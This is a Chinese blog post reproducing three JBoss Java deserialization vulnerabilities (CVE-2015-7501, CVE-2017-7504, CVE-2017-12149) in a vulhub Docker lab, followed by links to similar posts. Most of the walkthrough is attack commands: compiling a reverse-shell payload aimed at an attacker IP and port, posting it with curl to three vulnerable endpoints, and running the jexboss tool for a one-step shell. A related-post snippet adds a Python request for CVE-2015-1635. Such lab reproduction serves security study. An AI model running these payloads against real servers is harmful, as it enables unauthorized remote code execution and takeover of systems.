Jboss反序列化漏洞复现

已于 2023-02-28 15:44:06 修改
阅读量654 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全
于 2023-02-24 23:29:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/129190898
版权

Jboss反序列化漏洞复现

漏洞简介

CVE-2015-7501

JBoss 在 /invoker/JMXInvokerServlet请求中读取了用户传入的对象,从而导致了漏洞。

CVE-2017-7504

JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化,CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下

CVE-2017-12149

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

环境搭建

直接在docker上用vulhub去搭建,进去找到jboss漏洞的目录,想开哪个开哪个。

复现过程

方式一

因为这三个的复现流程和方式都是一样的,只有访问的接口不同,所以直接改访问的接口就行。以下用CVE-2015-7501来做例子。

1.访问其网址,访问其接口/invoker/JMXInvokerServlet ,发现有东西可以下载,说明这个接口开放,且存在漏洞。

在这里插入图片描述

2.去git上下载工具CVE-2015-7501到攻击机上

3.在攻击机上执行各种命令进行攻击。每个反序列化的接口不一样。

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port 
(IP是攻击机ip,port是要监听的端口)

//执行攻击
curl http://192.168.42.132:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

//cve-2017-12149
curl http://192.168.42.132:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

//cve-2017-7504
curl http://192.168.42.132:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

注意,这种情况,如果是在内网搭建的机器,可能会弹不回来shell。而且在用java去编译生产ser文件的时候会报错误,如果报错,需要更改java版本。

cd /opt
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin

方式二(简单)

1.下载工具 jexboss

2.进行攻击,然后看见有漏洞,输入yes, 会自己返回shell

python3 jexboss.py -u  网址

在这里插入图片描述

在这里插入图片描述

免责声明:本文仅限于进行安全测试,请勿使用来作攻击他人电脑,造成损失和违法犯罪行为与作者本人无关。

00zzz
关注
专栏目录
漏洞复现JBoss(CVE-2017-12149)反序列化漏洞
做自己喜欢的事,并将其发挥到极致!
03-24 606
文章目录声明前言一、漏洞描述二、漏洞原理三、漏洞分析JBoss反序列化漏洞分析四、影响版本五、漏洞利用实战复现六、漏洞修复修复原理方法一方法二方法三 声明 本篇文章仅用于漏洞研究和技术学习,切勿用于未授权下的渗透测试行为,切记! 前言 JBoss 存在反序列化漏洞,攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危。 一、漏洞描述 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 在 /invoker/readonly 路径下
漏洞复现Jboss反序列化漏洞CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 916
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)复现
KaNongDD的博客
09-18 1435
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 730
vulhub漏洞复现-jboss反序列化漏洞
Jboss反序列化漏洞CVE-2015-7501
最新发布
2401_82451607的博客
09-22 357
Jboss反序列化漏洞CVE-2015-7501
反序列化JBOSS反序列化
zh的博客
10-15 415
靶场地址:http://whalwl.site:8037/ 解题准备:反序列化基本原理 解题思路: 1、访问首页,发现有管理员后台链接,点击后获得JBOSS版本 JBoss AS 6 Admin Console 2、网上搜索相关漏洞 访问这个地址报500,说明漏洞存在 3、下载漏洞利用工具,填写刚才的漏洞地址,检测存在漏洞,执行相关系统命令获取flag 4、工具直接执行命令 ...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JBoss 5.x/6.x 反序列化漏洞复现CVE-2017-12149)
qq_40860153的博客
06-14 461
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。2、使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,需要进行一次编码。反弹shell工具,地址:https://github.com/joaomatosf/jexboss。vulhub靶场环境: http://192.168.1.129:8080/
【Vulhub】CVE-2017-7504 JBOSS反序列化漏洞复现
看不尽的尘埃——博客
02-07 9071
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,因此用的东西都是一样的,笔者这里使用上次复现CVE-2017-12149的时候的POC文件。 笔者还特别查了下两种区别: CVE-2017-7504 影响范围...
Jboss反序列化漏洞CVE-2017-12149复现
weixin_43736941的博客
07-24 469
Jboss反序列化漏洞CVE-2017-12149复现 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1258
JBoss Application Server 相关漏洞复现
JBOOS反序列化漏洞复现
hl1293348082的专栏
03-31 206
2017 年 9 月 14 日,国家信息安全漏洞共享平台( CNVD )收录了 JBOSS Application Server 反序列化命令执行漏洞( CNVD-2017-33724,对应 CVE-2017-12149 ),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。 漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。 0x01. 漏洞复现 1). 环境准备 JBOSS 下载地址:http://download.jboss.org/jbossas/
java反序列化RCE回显研究
java276582434的博客
05-25 2518
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行的命令写入服务器文件...
Jboss 反序列化 CVE-2017-12149
npc88888的博客
05-12 655
JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
ADummy的博客
03-03 186
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 ​ 影响版本
Jboss CVE-2017-12149JBoss 反序列化漏洞利用
baiyongliang
06-13 2489
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放...
jboss服务器反序列化漏洞解决方案
weixin_34220963的博客
02-25 1079
漏洞详情 披露状态: 2014-07-31:细节已通知厂商并且等待厂商处理中2014-08-05:厂商已经主动忽略漏洞,细节向公众公开 简要描述: 未对jboss的invoker进行正确的权限设置,导致认证绕过 详细说明: http://dapei.mo.vancl.com/invoker/JMXInvokerServletjboss本身的漏洞,即使限制了jmx-console、w...
cve-2015-1635漏洞复现
07-28
你好!对于CVE-2015-1635漏洞复现,首先需要明确这是一个远程代码执行漏洞,也被称为HTTP.sys远程代码执行漏洞。该漏洞存在于Microsoft Windows系统的HTTP协议堆栈中。 复现漏洞的一种方法是发送特制的HTTP请求来触发漏洞,并执行恶意代码。以下是一个简单的Python示例代码,用于发送恶意请求: ```python import requests url = "http://目标IP地址/" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Content-Length': '18446744073709551615', 'Host': '目标IP地址' } response = requests.get(url, headers=headers) print(response.text) ``` 在代码中,将`目标IP地址`替换为目标服务器的IP地址。这个请求会发送一个特殊长度的`Content-Length`头部字段,触发远程执行漏洞。 请注意,这个示例只是为了说明漏洞的原理,实际应用中需要谨慎操作并确保遵守法律法规。建议在合法授权和测试环境中进行漏洞测试,以维护网络安全。 如果你需要更详细的复现步骤或其他安全问题,请提供更多细节,我将尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值